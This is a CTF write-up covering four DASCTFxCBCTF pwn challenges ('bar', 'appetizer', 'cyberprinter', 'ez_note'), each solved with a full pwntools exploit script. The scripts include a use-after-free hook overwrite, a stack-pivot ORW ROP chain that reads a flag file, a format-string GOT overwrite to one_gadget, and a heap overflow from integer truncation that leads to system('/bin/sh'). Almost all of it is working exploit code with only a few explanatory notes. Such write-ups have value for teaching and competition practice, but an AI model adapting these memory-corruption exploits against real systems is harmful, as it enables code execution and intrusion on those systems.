
DASCTFxCBCTF-pwn

DASCTFxCBCTF pwn

bar

libc 2.31, UAF (use-after-free)

from pwn import *
binary = "./bar"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
ip = 'node4.buuoj.cn'
port = 26032
# 1 -> run the binary locally under pwntools, 0 -> connect to the remote instance.
local = 1
io = process(binary) if local else remote(ip, port)

#context.log_level = "debug"

def debug():
    """Attach gdb to the live target, then block until the user continues."""
    gdb.attach(io)
    pause()

def s(data):
    """Send *data* to the target unchanged."""
    return io.send(data)

def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)

def sa(text, data):
    """Wait for *text* on the connection, then send *data*."""
    return io.sendafter(text, data)

def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)

def r():
    """Receive whatever is currently available."""
    return io.recv()

def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)

def uu32():
    """Read until the first 0xff byte; unpack the last 4 received bytes (0xff on top) as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))

def uu64():
    """Read until the first 0x7f byte; unpack the last 6 received bytes, zero-extended to 8, as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))

def lg(data):
    """Log ``<name> -> 0x<value>`` for the script variable named by *data*."""
    # eval() resolves the name in this module; it is only ever called with literal names
    # written in this script (e.g. 'libcbase') and must not be given data received from the target.
    return io.success('%s -> 0x%x' % (data, eval(data)))

def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Left over from the author's template; nothing in this listing references it.
_flags = 0xfbad1800

def menu(n):
    """Answer the 'Your choice:' prompt with menu option *n*."""
    choice = str(n)
    sla(b'Your choice:', choice)

def add(mode, con=b'a'):
    """Menu option 1: answer the drink prompt with *mode*, then send *con* (no newline) as the note text."""
    menu(1)
    drink = str(mode)
    sla(b'Whisky , brandy or Vodka?', drink)
    sa(b'You may want to tell sth to the waiter:', con)

def delete(idx, size):
    """Menu option 2: answer the index and size prompts; both values are sent verbatim, nothing is validated locally."""
    menu(2)
    for prompt, value in ((b'Which?', idx), (b'How much?', size)):
        sla(prompt, str(value))

def show():
    """Menu option 3; the caller reads whatever the program prints afterwards."""
    menu(3)

# Leak: option 3 prints a 14-character hex value after the banner. The author subtracts a
# hard-coded offset (0x1ec6a0) instead of using libc.sym, so the result is tied to the task's
# libc-2.31.so — re-derive it if a different libc build is used.
show()
ru(b'We will give everyone only one cup of icecream!\n')
libcbase = int(io.recv(14), 16) - 0x1ec6a0
malloc_hook = libcbase + 0x1ebb70  # also a hard-coded offset, not libc.sym['__malloc_hook']
lg('libcbase')
# Candidate one_gadget offsets for this libc; the string literal below records the register
# constraints the author copied for each one (it is a bare expression statement, not a comment).
one = [0xe6aee, 0xe6af1, 0xe6af4]
ogg = libcbase + one[1]
'''
0xe6aee execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''

# Allocation / free sequence as the writeup gives it (the heading labels the bug a UAF on
# libc 2.31). The mode passed to add() and the (index, size) pair passed to delete() go to
# the binary verbatim; the order of these calls is part of the recipe, so keep it as written.
add(0)
add(0)
add(2)
add(2)
add(2)
add(0)
add(0)
add(0)
add(0)

delete(3, 0x40)
delete(2, 0x40)
delete(0, 0x100)
add(0, b'a' * 0xf8 + p64(0x421))
delete(1, 0x100)

add(1)
add(0, b'a' * 0x98 + p64(0x51) + p64(malloc_hook - 0x10))

add(2)
add(2, p64(ogg))
# The last option-1 request is issued by hand: only the drink prompt is answered, add() is
# not used, and the script then drops to an interactive session.
menu(1)
sla(b'Whisky , brandy or Vodka?', str(0))
ia()

appetizer

栈迁移

from pwn import *
binary = "./appetizer"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
#libc = elf.libc
ip = 'node4.buuoj.cn'
port = 25106
# 1 -> run the binary locally under pwntools, 0 -> connect to the remote instance.
local = 0
io = process(binary) if local else remote(ip, port)

# Verbose pwntools logging of every send/recv.
context.log_level = "debug"

def debug():
    """Attach gdb to the live target, then block until the user continues."""
    gdb.attach(io)
    pause()

def s(data):
    """Send *data* to the target unchanged."""
    return io.send(data)

def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)

def sa(text, data):
    """Wait for *text* on the connection, then send *data*."""
    return io.sendafter(text, data)

def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)

def r():
    """Receive whatever is currently available."""
    return io.recv()

def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)

def uu32():
    """Read until the first 0xff byte; unpack the last 4 received bytes (0xff on top) as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))

def uu64():
    """Read until the first 0x7f byte; unpack the last 6 received bytes, zero-extended to 8, as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))

def lg(data):
    """Log ``<name> -> 0x<value>`` for the script variable named by *data*."""
    # eval() resolves the name in this module; it is only ever called with literal names
    # written in this script (e.g. 'libcbase') and must not be given data received from the target.
    return io.success('%s -> 0x%x' % (data, eval(data)))

def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Left over from the author's template; nothing in this listing references it.
_flags = 0xfbad1800

'''gdb.attach(io, 'b* $rebase(0x1372)')
pause()'''
# Identity check: two filler bytes followed by the 8-byte little-endian constant
# 0x7373656c656d614e (the value the program expects; taken as given by the author).
sa(b"Let's check your identity", b'a' * 2 + p64(0x7373656c656d614e))
ru(b'Here you are:')
# The program echoes a 14-char hex address (buf). base is derived from it with two fixed
# adjustments (-0x3050, then -0x1000); both are binary-specific — verify against the real mapping.
buf = int(io.recv(14), 16)
base = buf - 0x3050
base = base - 0x1000
end = base + 0x4050  # computed and logged only; not referenced afterwards
lg('end')
lg('buf')
lg('base')


# Binary-relative addresses, all hard-coded rather than taken from elf.sym / elf.got.
puts_got = base + 0x3fa0
puts_plt = base + 0x10B0
pop_rdi = base + 0x14d3
leave_ret = base + 0x12d8
start = base + 0x13D2  # defined but not used below
ret = base + 0x101a  # defined but not used below
read_again = base + 0x1428
pop_rbp = base + 0x11f3  # defined but not used below


# Stage 1: 0x60 bytes of padding, then pop rdi / puts_got / puts_plt, returning into read_again.
payload1 = b'\x00' * 0x60 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload1 += p64(read_again)
sa(b'And pls write your own information on it', payload1)



# Stage 2 (the "栈迁移" of the heading): new rbp = buf + 0x60 - 8, followed by leave; ret.
payload2 = p64(buf + 0x60 - 8) + p64(leave_ret)
sa(b'Tell me your wish:', payload2)

# uu64() consumes output up to the first 0x7f byte and unpacks the 6 bytes ending there.
libcbase = uu64() - libc.sym['puts']
lg('libcbase')
open_addr = libcbase + libc.sym['open']
read_addr = libcbase + libc.sym['read']
write_addr = libcbase + libc.sym['write']
# Gadget offsets are hard-coded libc-relative constants (unlike the symbols above) and only
# hold for the task's libc-2.31.so.
pop_rsi = libcbase + 0x27529
pop_rdx_rbx = libcbase + 0x1626d6
#pop_rsi = libcbase + 0x2601f

# Stage 3: "./flag" is placed at the start of buf, then open(buf, 0) / read(3, buf + 8, 0x30) /
# write(1, ...). The write call sets only rdi, so it presumably relies on rsi/rdx still holding
# the values loaded for read() — confirm under a debugger if the output does not appear.
payload3 = b'./flag' + b'\x00' * 2 + b'\x00' * 0x70 + p64(pop_rdi) + p64(buf) + p64(pop_rsi) + p64(0) + p64(open_addr)
payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(buf + 8) + p64(pop_rdx_rbx) + p64(0x30) + p64(0) + p64(read_addr)
payload3 += p64(pop_rdi) + p64(1) + p64(write_addr)
s(payload3)
ia()

cyberprinter

格式化字符串漏洞：把 puts 调用链中某个函数的 GOT 表项改写为 one_gadget（ogg）

from pwn import *
binary = "./cyberprinter"
elf = ELF(binary)
# Unlike the other solutions on this page, no libc file is loaded explicitly; pwntools' own
# lookup for the binary's libc is used instead.
libc = elf.libc
ip = 'node4.buuoj.cn'
port = 28514
# 1 -> run the binary locally under pwntools, 0 -> connect to the remote instance.
local = 0
io = process(binary) if local else remote(ip, port)

# Verbose pwntools logging of every send/recv.
context.log_level = "debug"
context(arch = 'amd64', os = 'linux')
def debug():
    """Attach gdb to the live target, then block until the user continues."""
    gdb.attach(io)
    pause()

def s(data):
    """Send *data* to the target unchanged."""
    return io.send(data)

def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)

def sa(text, data):
    """Wait for *text* on the connection, then send *data*."""
    return io.sendafter(text, data)

def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)

def r():
    """Receive whatever is currently available."""
    return io.recv()

def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)

def uu32():
    """Read until the first 0xff byte; unpack the last 4 received bytes (0xff on top) as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))

def uu64():
    """Read until the first 0x7f byte; unpack the last 6 received bytes, zero-extended to 8, as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))

def lg(data):
    """Log ``<name> -> 0x<value>`` for the script variable named by *data*."""
    # eval() resolves the name in this module; it is only ever called with literal names
    # written in this script (e.g. 'libcbase') and must not be given data received from the target.
    return io.success('%s -> 0x%x' % (data, eval(data)))

def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Left over from the author's template; nothing in this listing references it.
_flags = 0xfbad1800


# Name prompt: 0x17 bytes of 'a'. uu64() then takes the 6 bytes up to the first 0x7f in the
# echoed output. 0x1ec5c0 is a hard-coded libc-2.31 offset (not libc.sym) — re-check it for
# any other libc build.
sla(b'Your name?pls..', b'a' * 0x17)
libcbase = uu64() - 0x1ec5c0
lg('libcbase')

# Both addresses are hard-coded libc-relative offsets: ABS_got is the GOT entry the heading
# describes (a function in puts's call chain), `one` the chosen one_gadget.
ABS_got = libcbase + 0x1eb0a8
one = libcbase + 0xe6af1

# fmtstr_payload: the format string is at argument index 8; one write, ABS_got <- one.
payload = fmtstr_payload(8, {ABS_got:one})

sa(b"But there is sth wrong in it,so you can't do sth", payload)

ia()

ez_note

输入的 size 为 long int 类型，而判断 size 大小时被强制类型转换成了 int。由于 long int 为 8 字节、int 为 4 字节，转换后只保留低 4 字节的内容；但后面读入堆块内容时使用的 size 仍是原始输入的 long int 值，因此可以造成堆溢出，之后打堆重叠即可。

from pwn import *
binary = "./pwn"
elf = ELF(binary)
libc = ELF('./libc-2.31.so')
ip = 'node4.buuoj.cn'
port = 27455
# 1 -> run the binary locally under pwntools, 0 -> connect to the remote instance.
local = 0
io = process(binary) if local else remote(ip, port)

#context.log_level = "debug"

def debug():
    """Attach gdb to the live target, then block until the user continues."""
    gdb.attach(io)
    pause()

def s(data):
    """Send *data* to the target unchanged."""
    return io.send(data)

def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)

def sa(text, data):
    """Wait for *text* on the connection, then send *data*."""
    return io.sendafter(text, data)

def sla(text, data):
    """Wait for *text*, then send *data* plus a newline."""
    return io.sendlineafter(text, data)

def r():
    """Receive whatever is currently available."""
    return io.recv()

def ru(text):
    """Receive up to and including *text*."""
    return io.recvuntil(text)

def uu32():
    """Read until the first 0xff byte; unpack the last 4 received bytes (0xff on top) as a u32."""
    tail = io.recvuntil(b"\xff")[-4:]
    return u32(tail.ljust(4, b'\x00'))

def uu64():
    """Read until the first 0x7f byte; unpack the last 6 received bytes, zero-extended to 8, as a u64."""
    tail = io.recvuntil(b"\x7f")[-6:]
    return u64(tail.ljust(8, b"\x00"))

def lg(data):
    """Log ``<name> -> 0x<value>`` for the script variable named by *data*."""
    # eval() resolves the name in this module; it is only ever called with literal names
    # written in this script (e.g. 'libcbase') and must not be given data received from the target.
    return io.success('%s -> 0x%x' % (data, eval(data)))

def ia():
    """Hand the connection over to the user."""
    return io.interactive()

# Left over from the author's template; nothing in this listing references it.
_flags = 0xfbad1800

def menu(n):
    """Answer the 'Your choice:' prompt with menu option *n*."""
    choice = str(n)
    sla(b'Your choice:', choice)

def add(size, con=b'a'):
    """Menu option 1: send *size* (as text, no newline) at the size prompt, then *con* at the content prompt."""
    menu(1)
    for prompt, value in ((b'Note size:', str(size)), (b'Note content:', con)):
        sa(prompt, value)

def delete(idx):
    """Menu option 2: answer the 'Note ID:' prompt with *idx*."""
    menu(2)
    note_id = str(idx)
    sla(b'Note ID:', note_id)

def show(idx):
    """Menu option 3: answer the 'Note ID:' prompt with *idx*; the caller reads the output."""
    menu(3)
    note_id = str(idx)
    sla(b'Note ID:', note_id)

# Five notes; the trailing "#N" comments are the author's index bookkeeping.
add(0x80)
add(0x200) #1
add(0x200) #2
add(0x200) #3
add(0x200)

delete(0)
# size 0x100000080: its low 32 bits are 0x80, which is what the description says the size
# check sees after the long -> int truncation, while the full value governs the content read.
add(0x100000080, b'a' * 0x80 + p64(0) + p64(0x631))
delete(1)
add(0x200) #1
show(2)
# Leak from show(2): uu64() takes the 6 bytes up to the first 0x7f; the adjustment combines
# libc.sym['__malloc_hook'] with fixed constants (-0x10 - 96).
libcbase = uu64() - libc.sym['__malloc_hook'] - 0x10 - 96
lg('libcbase')
free_hook = libcbase + libc.sym['__free_hook']
sys_addr = libcbase + libc.sym['system']

delete(4)
delete(3)
# Note: 211 here is decimal (0xd3) while every other size in this script is hex; left exactly
# as the author wrote it.
add(0x220, b'a' * 0x200 + p64(0) + p64(211) + p64(free_hook)) #3
add(0x200, b'/bin/sh\x00') #4
add(0x200, p64(sys_addr))
delete(4)
ia()